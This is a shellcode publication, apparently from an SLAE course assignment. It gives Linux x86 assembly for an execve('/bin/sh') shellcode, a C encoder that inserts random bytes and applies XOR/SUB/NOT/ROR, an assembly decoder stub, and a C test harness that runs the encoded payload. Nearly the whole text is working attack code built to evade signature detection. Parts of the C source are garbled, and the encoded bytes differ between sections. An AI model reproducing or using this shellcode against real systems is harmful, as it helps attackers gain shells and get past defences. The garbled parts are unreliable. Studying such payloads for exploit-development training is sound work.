# Title : Linux/x86 - Encoder - Random Bytes + XOR/SUB/NOT/ROR / Decoder - ROL/NOT/ADD/XOR execve(/bin/sh) Shellcode (117 bytes) # Author : Xenofon Vassilakopoulos # Date : July, 2019 # Tested on : Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux # Architecture : i686 GNU/Linux # Shellcode Length : 117 bytes # SLAE-ID : SLAE - 1314 ---------------------- execve-stack /bin/sh -------------------------------- global _start section .text _start: xor eax, eax push eax push 0x68732f2f push 0x6e69622f mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 ----------------------- Original Shellcode --------------------------------- "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" ----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes ------- global _start section .text _start: jmp short call_shellcode decoder: pop esi push esi xor ebx, ebx xor ecx, ecx xor edx, edx mov dl, len rotate: ;; apply the decoding scheme rol byte [esi], 4 not byte [esi] add byte [esi], 2 xor byte [esi], 0x2c inc esi cmp cl, dl je init inc cl jmp short rotate init: pop esi lea edi, [esi +1] xor eax, eax mov al, 1 xor ecx, ecx decode: cmp cl, dl je EncodedShellcode mov bl, byte [esi + eax + 1] mov byte [edi], bl inc edi inc cl add al, 2 jmp short decode call_shellcode: call decoder EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3 len equ $-EncodedShellcode --------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR --------------- xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c xenofon@slae:~/Documents/Assignment4$ ./encoder Shellcode: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 Shellcode Length 25 Decoded Shellcode: 0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80, Encoded shellcode 0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34, Encoded Shellcode Length 50 xenofon@slae:~/Documents/Assignment4$ cat encoder.c #include #include #include #include #include #include #define DEC 0x2 // the value that will be used to substract every byte #define XORVAL 0x2c // the value that will be used to xor with every byte // execve stack shellcode /bin/sh unsigned char shellcode[] = \ "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; void main() { int rot = 4; //right rotation 4 bits printf("\n\nShellcode:\n\n"); int o; for (o=0; o> sizeof(shellcode2[i])*(8-rot)); } // print encoded shellcode printf("\nEncoded shellcode\n\n"); i=0; for (i; i #include unsigned char code[] = \ "\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06" "\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04" "\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9" "\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47" "\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51" "\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb" "\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58" "\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad" "\xe1\x02\x8b\x55\x84"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }